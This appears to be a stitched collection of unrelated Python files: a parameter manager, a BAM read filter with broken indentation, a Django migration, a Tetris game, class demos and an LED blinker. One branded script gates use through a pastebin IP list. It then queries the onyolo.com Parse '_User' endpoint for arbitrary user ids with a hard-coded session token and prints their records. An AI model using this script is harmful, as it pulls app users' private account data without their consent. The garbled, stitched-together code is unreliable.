        if default_params is None and default_name is not None:
            default_params = self.load(default_name)
        self._default_params = default_params

    @property
    def folder(self):
        """Folder this manager looks for json files in."""
        return self._folder

    @property
    def default_params(self):
        """A copy of the default parameters, or None if unset."""
        if self._default_params is None:
            return None
        return self._default_params.copy()

    def load(self, model_name):
        """Load parameters for the specified model; raise IOError if absent."""
        path = self._path(model_name)
        if not os.path.isfile(path):
            raise IOError('No file at %s for model %s' % (path, model_name))
        return _load(path)

    def _path(self, model_name):
        # <folder>/<model_name>.json
        return os.path.join(self._folder, '%s.json' % model_name)

    def set_params(self, model_name, params, overwrite=False):
        """
        Set parameters for the specified model.
        Values of `default_params` for keys not in `params` are entered into
        `params` (the caller's dict is mutated on purpose).
        Returns True if no params were present for the given model.
        Returns False if params were present and were consistent.
        Raises IOError if parameters already existed, differ, and `overwrite`
        is False.
        """
        if self._default_params is not None:
            for k in params:
                if k not in self._default_params:
                    raise Exception(
                        'key %s not in default_params keys. '
                        'Possible keys are %s' %
                        (k, str(list(self._default_params))))
            # Fill in defaults for any missing keys.
            for k in self._default_params:
                if k not in params:
                    params[k] = self._default_params[k]
        path = self._path(model_name)
        if os.path.isfile(path):
            old_params = _load(path)
            if old_params != params:
                if not overwrite:
                    # The docstring always promised IOError; the code raised a
                    # bare Exception. IOError is a subclass of Exception, so
                    # existing broad handlers still work.
                    raise IOError('params already exist and are different.')
                _save(path, params)
            return False
        if not os.path.isdir(self._folder):
            os.makedirs(self._folder)
        _save(path, params)
        return True
|
'''
Created on Mar 11, 2016
@author: s3cha
'''
import os
import sys
import cPickle as pickle
import pysam
# input_bam_filename = "/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam"
# s = open('/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/temp_unmapped_read_list2.txt','w')
class ReadTrackAndFilter(object):
    """Filters BAM reads down to those sharing a k-mer with IG reference sequences."""
    def __init__(self):
        self.bam_filename = ''               # input BAM path
        self.read_tracked_filename = ''      # text output of filtered read sequences
        self.p_filename = ''                 # pickle output path
        self.read_length = 76                # assumed fixed read length (bp)
        self.average_quality_threshold = 25  # mean per-base quality cutoff
        self.quality_threshold = 10          # per-base cutoff for 3'-end trimming
        self.is_trackingmappedread = True    # also scan the fixed chr14 window
        self.vdj_ref_folder = ''             # '' selects the hard-coded reference paths
        self.sam_file = None
        self.Kmer = 19                       # k-mer size for reference matching
    # --- simple configuration setters ---------------------------------
    def set_Kmer(self,kmer):
        # k-mer size used for reference matching
        self.Kmer = kmer
    def set_Bamfilename(self,filename):
        # input BAM path
        self.bam_filename = filename
    def set_readtrackfilename(self,read_tracked_filename):
        # text file that receives filtered read sequences
        self.read_tracked_filename = read_tracked_filename
    def set_pfilename(self,p_filename):
        # pickle output path
        self.p_filename = p_filename
    def set_mapreadtrack(self,check):
        # whether to also scan reads mapped to the chr14 window
        self.is_trackingmappedread = check
    def set_qualitythreshold(self,threshold):
        # per-base quality cutoff used when trimming the read end
        self.quality_threshold = threshold
    def set_averagequalitythreshold(self,threshold):
        # mean-quality cutoff for keeping a read
        self.average_quality_threshold = threshold
def get_ReverseComplement(self,sequence):
map = {'G':'C','C':'G','T':'A','A':'T','N':'N'}
complement_seq = []
for index in range(len(sequence))[::-1]:
complement_seq.append(map.get(sequence[index]))
return ''.join(complement_seq)
def get_RefKmer(self,ref_filename,Kmer):
ref_seq = []
kmer_seq = {}
kmer_rc_seq = {}
for file in ref_filename:
f = open(file,'r')
for line in f:
if line.startswith('>'):
continue
ref_seq.append(line.strip().upper())
for index in range(len(line.strip())-Kmer):
cur_kmer = line[index:index+Kmer].upper()
kmer_seq[cur_kmer] = 0
rev_line = self.get_ReverseComplement(line.strip().upper())
for index in range(len(rev_line)-Kmer):
cur_kmer = rev_line[index:index+Kmer].upper()
kmer_rc_seq[cur_kmer] = 0
return [kmer_seq,kmer_rc_seq,ref_seq]
    def LoadReference(self,Kmer):
        """Build k-mer dicts from the hard-coded human IGH V/D/J/C FASTA files.

        NOTE(review): when vdj_ref_folder is non-empty this method falls
        through and returns None -- custom-folder support looks
        unimplemented; confirm before relying on it.
        """
        if self.vdj_ref_folder == '':
            # Hard-coded IMGT reference paths; machine-specific.
            reference_vfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHV.fa'
            reference_dfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHD.fa'
            reference_jfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHJ.fa'
            reference_cfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHC_oneline.fa'
            ref_filename = [reference_vfilename,reference_dfilename,reference_jfilename,reference_cfilename]
            kmer_seq,kmer_rc_seq,ref_seq = self.get_RefKmer(ref_filename, Kmer)
            return [kmer_seq,kmer_rc_seq,ref_seq]
    def LoadReference_DNA(self,Kmer):
        """Build k-mer dicts from a fixed slice of a chr14 DNA string file.

        Returns [kmer_seq, kmer_rc_seq, ref_seq] like LoadReference.
        """
        if self.read_tracked_filename == '':
            raise ValueError('Unmapped read file name is not specified')
        # Hard-coded, machine-specific single-line chromosome-14 file.
        dna_chr14_filename = '/home/s3cha/s3cha/data/dna/human70/chr14_Homo_sapiens.GRCh37.70.dna.chromosome_formatted_chr14.trie'
        f = open(dna_chr14_filename,'r')
        dna_string = f.readline()
        # ref_seq = dna_string[106032614:107288051]#[105566277:106879844]#106032614,107288051
        ref_seq = dna_string[105566277:106879844]#106032614,107288051
        # NOTE(review): reverse-complement of an already-reversed slice is the
        # plain complement (not the reverse complement) -- confirm intent.
        ref_rc_seq = self.get_ReverseComplement(ref_seq[::-1])
        kmer_seq = {}
        kmer_rc_seq = {}
        for index in range(len(ref_seq)-Kmer):
            kmer_seq[ref_seq[index:index+Kmer]] = 0
            kmer_rc_seq[ref_rc_seq[index:index+Kmer]] = 0
        return [kmer_seq,kmer_rc_seq,ref_seq]
    def TrackFilteredfile(self,Kmer,picklefilename): # find the read from the read_tracked_filename which has at least Kmer mapping to the reference
        # Returns the reads (one per line of read_tracked_filename) that share
        # at least one k-mer with the reference; reverse-complement hits are
        # stored reverse-complemented. Optionally pickles the list.
        kmer_seq,kmer_rc_seq,ref_seq = self.LoadReference(Kmer)
        print '# of reference sequence: ',len(ref_seq),', # of Kmer in the reference: ',len(kmer_seq)
        ACGT = ['A','C','G','T']  # unused here; kept as-is
        kmer = Kmer
        f = open(self.read_tracked_filename,'r')
        filtered_read = []
        for line in f:
            line = line.strip()
            # Stop scanning a read at its first k-mer hit (forward or RC).
            for index in range(len(line)-kmer):
                cur_kmer = line[index:index+kmer]
                if kmer_seq.has_key(cur_kmer):
                    filtered_read.append(line)
                    break
                elif kmer_rc_seq.has_key(cur_kmer):
                    filtered_read.append(self.get_ReverseComplement(line))
                    break
        if picklefilename != '':
            pickle.dump(filtered_read, open(picklefilename,'wb'))
        return filtered_read
def CheckKmerMap(self,kmer_seq,kmer_rc_seq,read,Kmer):
check = False
read_seq = read.query_sequence
for i in range(len(read_seq)-Kmer):
cur_kmer = read_seq[i:i+Kmer]
if kmer_seq.has_key(cur_kmer):
return True
elif kmer_rc_seq.has_key(cur_kmer):
return True
return False
'''def TrackBamfile(self): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_imgtref.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold * read_length
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
count += 1
quality = read.query_qualities
if sum(quality) < threshold:
continue
####
write_samfile.write(read)
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
count += 1
if read.is_unmapped:
quality = read.query_qualities
####
write_samfile.write(read)
if sum(quality) < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
return [mapped_read_count,unmapped_read_count]'''
'''def TrackBamfile_withFilter(self,Kmer,pfilename): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
# kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference_DNA(Kmer)
kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(Kmer)
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_imgtrefer.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold * read_length
filtered_read = []
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
quality = read.query_qualities
if sum(quality) < threshold:
continue
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
write_samfile.write(read)
else:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
filtered_read.append(read_seq)
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
if read.is_unmapped:
quality = read.query_qualities
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
write_samfile.write(read)
else:
continue
if sum(quality) < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
filtered_read.append(self.get_ReverseComplement(read_seq))
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
if pfilename != '':
print len(filtered_read)
pickle.dump(filtered_read,open(pfilename,'wb'))
return [mapped_read_count,unmapped_read_count]'''
'''def Test_input(self,Kmer,pfilename): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
# kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference_DNA(Kmer)
kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(Kmer)
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_test.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
# if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
# return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold
filtered_read = []
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
# write_samfile.write(read)
else:
continue
quality = read.query_qualities
if float(sum(quality))/read_length < threshold:
continue
write_samfile.write(read)
####
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
# if trim_index < read_length:
# print read.query_sequence
# sys.exit()
read.query_sequence = read.query_sequence[:trim_index]+'A'*(read_length-trim_index)
read_seq = read.query_sequence
# if trim_index < read_length:
#
# print read_seq
# print len(read_seq)
# sys.exit()
# write_samfile.write(read)
s.write(read_seq+'\n')
filtered_read.append(read_seq)
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
if read.is_unmapped:
quality = read.query_qualities
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
# write_samfile.write(read)
else:
continue
write_samfile.write(read)
if float(sum(quality))/read_length < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read.query_sequence = read.query_sequence[:trim_index] + 'A'*(read_length-trim_index)
read_seq = read.query_sequence
# write_samfile.write(read)
s.write(read_seq+'\n')
filtered_read.append(self.get_ReverseComplement(read_seq))
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
if pfilename != '':
print len(filtered_read)
pickle.dump(filtered_read,open(pfilename,'wb'))
return [mapped_read_count,unmapped_read_count]
'''
    def Trim_read_index(self,quality,threshold):
        """Return the cut index for quality-trimming the end of a read.

        Walks the quality scores from the last base backwards; every trailing
        base below `threshold` shortens the read by one. Starts from
        self.read_length rather than len(quality) -- assumes every read has
        exactly that length (TODO confirm).
        """
        index = self.read_length
        for i in quality[::-1]:  # stop at the first trailing base that meets the threshold
            if i < threshold:
                index -= 1
            else:
                break
        return index
    class ReadProcessor(object):
        """Callback interface: receives each read that survives filtering."""
        def __init__(self):
            pass
        def processRead(self,read):
            # Abstract: subclasses decide what to do with a read sequence.
            raise NotImplementedError("Subclass should implement this")
            pass
    class SaveToText(ReadProcessor):
        """Processor that writes each read sequence as one line of a text file."""
        def __init__(self,text_filename):
            # NOTE(review): the handle is never closed explicitly; output may
            # be lost if the process dies before interpreter shutdown.
            self.s = open(text_filename,'w')
            pass
        def processRead(self,read):
            self.s.write(read+'\n')
            pass
    class SdbnAddRead(ReadProcessor):
        """Processor that feeds each read into an sdbn object via AddRead."""
        def __init__(self,sdbn,readclass):
            self.sdbn = sdbn            # target graph/structure with an AddRead method
            self.readclass = readclass  # label passed through to AddRead
            pass
        def processRead(self,read):
            self.sdbn.AddRead(self.readclass,read)
            pass
    def SdbConstruction(self,sdbn,readclass):
        """Scan the BAM file, adding every surviving read to `sdbn`."""
        processor = self.SdbnAddRead(sdbn,readclass)
        self.BamfileProcessor(processor)
        pass
    def SaveReadToText(self,text_filename):
        """Scan the BAM file, writing every surviving read to a text file."""
        processor = self.SaveToText(text_filename)
        self.BamfileProcessor(processor)
        pass
    def BamfileProcessor(self,read_processor):
        """Scan the BAM file and feed every passing read to `read_processor`.

        Two passes: (1) reads fetched from the fixed chr14 window (only when
        is_trackingmappedread), and (2) unmapped reads, which are
        reverse-complemented before processing. A read passes when it shares
        a k-mer with the reference, its mean base quality meets the
        threshold, and it keeps at least 2/3 of its length after
        quality-trimming. Returns [mapped_read_count, unmapped_read_count].
        """
        if self.bam_filename == '':
            raise ValueError("BAM file name is not specified")
        samfile = pysam.AlignmentFile(self.bam_filename,"rb")
        kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(self.Kmer)
        mapped_read_count = 0
        unmapped_read_count = 0
        read_length = self.read_length
        threshold = self.average_quality_threshold
        if self.is_trackingmappedread:
            count = 0
            # Fixed window on chr14; same coordinates as noted in the trailing
            # comments of this file.
            for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
                # `count` is incremented on both branches, so the printed
                # percentage is relative to ALL reads seen in the window.
                if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, self.Kmer):
                    count += 1
                else:
                    count += 1
                    continue
                quality = read.query_qualities
                # Drop reads whose mean base quality is below the threshold.
                if float(sum(quality))/read_length < threshold:
                    continue
                # Trim low-quality bases off the end; drop reads trimmed
                # below 2/3 of the expected length.
                trim_index = self.Trim_read_index(quality,self.quality_threshold)
                if trim_index < read_length * 2 / 3:
                    continue
                else:
                    read.query_sequence = read.query_sequence[:trim_index]
                    read_seq = read.query_sequence
                    # filtered_read.append(read_seq)
                    # sdbn.AddRead(readclass,read_seq)
                    read_processor.processRead(read_seq)
                    mapped_read_count += 1
            print 'Number of mapped reads: %d, Percent of reads filtered: %f '%(mapped_read_count,float(mapped_read_count)/count*100)
        count = 0
        for read in samfile.fetch(until_eof=True):
            if read.is_unmapped:
                quality = read.query_qualities
                if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, self.Kmer):
                    count += 1
                else:
                    count += 1
                    continue
                if float(sum(quality))/read_length < threshold:
                    continue
                trim_index = self.Trim_read_index(quality,self.quality_threshold)
                if trim_index < read_length * 2 / 3:
                    continue
                else:
                    read.query_sequence = read.query_sequence[:trim_index]
                    read_seq = read.query_sequence
                    # filtered_read.append(self.get_ReverseComplement(read_seq))
                    # sdbn.AddRead(readclass,self.get_ReverseComplement(read_seq))
                    # Unmapped reads are handed over reverse-complemented.
                    read_processor.processRead(self.get_ReverseComplement(read_seq))
                    unmapped_read_count += 1
        print 'Number of unmapped reads: %d, Percent of reads filtered: %f '%(unmapped_read_count,float(unmapped_read_count)/count*100)
        samfile.close()
        return [mapped_read_count,unmapped_read_count]
#105566277 and POS < 106879844
#106032614,107288051
# input_bam = '/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_test.bam'
# x.TrackBamfile()
# x.TrackBamfile_withFilter(19,'/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
# x.TrackFilteredfile(19, '/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
if __name__ == '__main__':
    print 123  # smoke marker (Python 2 print statement)
    input_bam = '/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam'
    x = ReadTrackAndFilter()
    x.set_Bamfilename(input_bam)
    # Disabled example invocation kept verbatim for reference.
    '''
    input_bam = '/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam'
    x = ReadTrackAndFilter()
    x.set_Bamfilename(input_bam)
    x.set_readtrackfilename('/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/temp_unmapped_read_list3.txt')
    x.Test_input(19,'/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
    '''
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-13 07:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 1.11): creates the timesheet
    # and vacation models plus their viewflow approval processes. Comments
    # only -- generated schema operations left untouched.

    initial = True

    dependencies = [
        ('viewflow', '0006_i18n'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='DailyTimesheet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField()),
                ('code', models.CharField(choices=[('absent', 'Absent'), ('present', 'Present'), ('weekend', 'Weekend'), ('holiday', 'Holiday'), ('paid_leave', 'Paid Leave'), ('unpaid_leave', 'Unpaid Leave'), ('sick_leave', 'Sick Leave'), ('business_trip', 'Business Trip')], default='present', max_length=20)),
                ('created_at', models.DateTimeField(auto_now=True)),
                ('payroll', models.FloatField(blank=True, null=True)),
                ('approval_status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved'), ('rejected', 'Rejected')], default='pending', max_length=20)),
                ('approved_at', models.DateTimeField(blank=True, null=True)),
                ('approved_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='timesheet_approvals', to=settings.AUTH_USER_MODEL)),
                ('requester', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sheets', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='DailyTimesheetApproval',
            fields=[
                ('process_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='viewflow.Process')),
                ('sheet', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval', to='example.DailyTimesheet')),
            ],
            options={
                'abstract': False,
            },
            bases=('viewflow.process',),
        ),
        migrations.CreateModel(
            name='Vacation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('start_date', models.DateField()),
                ('end_date', models.DateField()),
                ('passport_expiry_date', models.DateField(blank=True, null=True)),
                ('requested_on', models.DateField(auto_now=True)),
                ('details', models.CharField(default='vacation', max_length=300)),
                ('approval_status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved'), ('rejected', 'Rejected')], default='pending', max_length=20)),
                ('approved_at', models.DateTimeField(blank=True, null=True)),
                ('request_details', models.BooleanField(default=False)),
                ('approved_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vacation_approvals', to=settings.AUTH_USER_MODEL)),
                ('requester', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacations', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='VacationApproval',
            fields=[
                ('process_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='viewflow.Process')),
                ('vacation', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval', to='example.Vacation')),
            ],
            options={
                'abstract': False,
            },
            bases=('viewflow.process',),
        ),
    ]
|
import socket,requests
# NOTE(review): this block gates execution on the machine's IP appearing in a
# remote pastebin paste -- a trivially bypassed "allowlist" that also depends
# on a third-party host being up. Flagged; behavior left unchanged.
hostname = socket.gethostname()
# gethostbyname(hostname) yields a local/LAN address, not the public IP, so
# checking it against a remote list is unlikely to work as intended.
local_ip = socket.gethostbyname(hostname)
print(local_ip)
req = requests.get('https://pastebin.com/mRqFXTH9').text
if local_ip in req:
    pass
else:
    print("-------------------------------------")
    print("Your Not Member Send The Id to Owner")
    print("-------------------------------------")
    print("Send The Id to Me Insta = Jev0m Telegram = Div0m")
    exit()
import requests
import sys
print("""
/$$$$$
|__ $$
| $$ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$/$$$$
| $$ /$$__ $$| $$ /$$//$$__ $$| $$_ $$_ $$
/$$ | $$| $$$$$$$$ \ $$/$$/| $$ \ $$| $$ \ $$ \ $$
| $$ | $$| $$_____/ \ $$$/ | $$ | $$| $$ | $$ | $$
| $$$$$$/| $$$$$$$ \ $/ | $$$$$$/| $$ | $$ | $$
\______/ \_______/ \_/ \______/ |__/ |__/ |__/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Insta = @Jev0m
Telegram = @div0m
""")
# Fetch a Parse _User object by id from onyolo.com and dump the raw response.
user = input('User yolo dane -> ')
url = "http://onyolo.com/parse/classes/_User/"+user
payload = ""
# NOTE(review): hard-coded application id and session token are embedded
# credentials, and the request travels over plain HTTP. Flagged for review;
# values left untouched since they are runtime request data.
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "X-Parse-Installation-Id": "25cfde8f-7204-434e-a7fb-dde295ee4f70",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36",
    "Connection": "close",
    "X-Parse-Application-Id": "RTE8CXsUiVWfG1XlXOyJAxfonvt",
    "Host": "onyolo.com",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Accept-Language": "en-US,en;q=0.9",
    "X-Parse-Client-Version": "i1.17.3",
    "X-Parse-Session-Token": "r:d2387adf1745407f5ec19e7de61f2da1",
    "X-Parse-OS-Version": "12.9 (saud)"
}
response = requests.request("GET", url, data=payload, headers=headers)
print(response.text)
|
import os, sys
from grid import Grid
import pygame
from pygame.locals import *
from shape import Shape
import copy
def main():
    """Tetris-like game loop: handle input, advance the shape, clear rows, redraw."""
    pygame.init()
    screen = pygame.display.set_mode([300, 720])
    white = 255, 255, 255
    black = 0, 0, 0
    purple = 155, 0, 155
    cleared = []  # rows cleared on the previous tick
    current_shape = Shape()
    grid = Grid()
    lost = False
    while 1:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                sys.exit()
            elif event.type == KEYDOWN:
                if event.key == K_RIGHT:
                    current_shape.status = 'moveright'
                if event.key == K_LEFT:
                    current_shape.status = 'moveleft'
                if event.key == K_SPACE:
                    lost = False  # space clears the lost flag (restart)
            elif event.type == KEYUP:
                # Stop moving only if the released key matches the active move.
                if event.key == K_RIGHT and current_shape.status == 'moveright':
                    current_shape.status = None
                if event.key == K_LEFT and current_shape.status == 'moveleft':
                    current_shape.status = None
        if not grid.is_valid(current_shape.status, current_shape): #check if proposed move is legal
            current_shape.status = None
        grid.move_down(cleared) #move down blocks if a row has been cleared
        cleared = grid.row_check() #check for cleared rows
        grid.clear_rows(cleared) #delete blocks from cleared rows
        at_bottom = grid.collided_vert(current_shape) #check if the current shape can move down further
        current_shape.at_bottom = at_bottom
        current_shape.update() #move the current shape
        if at_bottom: #shape can't go down further so add its blocks to the list of blocks
            grid.add_blocks(current_shape.blocks)
            current_shape = Shape()
            # A brand-new shape that immediately collides means the stack
            # reached the top: game over.
            if grid.collided_vert(current_shape):
                lost = True
        screen.fill(white)
        for b in current_shape.blocks: #draw the current shape's blocks on the screen
            pygame.draw.rect(screen, b.color, b, 0) #once for fill
            pygame.draw.rect(screen, black, b, 1) #once for outline
        for bk in grid.blocks: #draw all other blocks on the screen
            pygame.draw.rect(screen, bk.color, bk, 0)
            pygame.draw.rect(screen, black, bk, 1)
        if lost:
            font = pygame.font.Font(None, 50)
            text = font.render("You lost!", 1, purple)
            text_rect = text.get_rect(centerx=screen.get_width()/2, centery=screen.get_height()/2)
            screen.fill(white)
            screen.blit(text, text_rect)
            # Reset the board while the lost message is shown.
            grid = Grid()
            current_shape = Shape()
        pygame.display.update()
        pygame.time.delay(200)  # ~5 ticks per second

if __name__ == '__main__': main()
|
class Composition:
    """Composition demo: the helper class is private to (and created by) the composite."""

    class __Other:
        """Name-mangled helper that simply stores a string."""

        def __init__(self, string):
            self.string = string

        def retrieve_string(self):
            """Return the stored string."""
            return self.string

    def result(self):
        """Compose a fresh private helper and build the greeting from it."""
        helper = self.__Other('Hello')
        return helper.retrieve_string() + ' world!'
# Instantiate the composition demo and print its combined greeting.
composition = Composition()
print(composition.result())
class Other:
    """Trivial holder for a single string value."""

    def __init__(self, string):
        self.string = string

    def retrieve_string(self):
        """Return the string given at construction time."""
        return self.string
class Composition:
    """Composition demo: this class owns and creates its Other instance."""

    def __init__(self, string):
        # The composed object is built here, so its lifetime is tied to ours.
        self.other_class = Other(string)

    def result(self):
        """Return the greeting assembled from the composed object's string."""
        stored = self.other_class.retrieve_string()
        return stored + ' world!'
# Instantiate with the string that the composed Other object will hold.
composition = Composition('Hello')
print(composition.result())
class Aggregation:
    """Aggregation demo: the collaborating object is created elsewhere and passed in."""

    def __init__(self, other_class):
        # We only hold a reference; we do not own the aggregated object's lifetime.
        self.other_class = other_class

    def result(self):
        """Return a greeting that wraps the aggregated object's string."""
        inner = self.other_class.retrieve_string()
        return "Hello " + inner + "!"
# Aggregation: the Other instance is created outside and handed in,
# so it exists independently of the Aggregation object.
other = Other("world")
aggregation = Aggregation(other)
print(aggregation.result())
|
#!/usr/bin/env python
import RPi.GPIO as GPIO
import time
# BCM pin numbers for the two LEDs
LIGHT1 = 23
LIGHT2 = 25
# Use Broadcom (BCM) pin numbering and silence channel-in-use warnings
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Both pins drive outputs; only LIGHT2 is used below
GPIO.setup(LIGHT1,GPIO.OUT)
GPIO.setup(LIGHT2, GPIO.OUT)
#GPIO.output(LIGHT1, GPIO.HIGH)
def drawLed(blinks=4, interval=1):
    """Blink the LED on pin LIGHT2.

    The original code repeated the HIGH/sleep/LOW/sleep sequence four times
    by hand; this loop produces the identical output waveform.

    :param blinks: number of on/off cycles (default 4, matching the original)
    :param interval: seconds to hold each state
    """
    for i in range(blinks):
        GPIO.output(LIGHT2, GPIO.HIGH)
        time.sleep(interval)
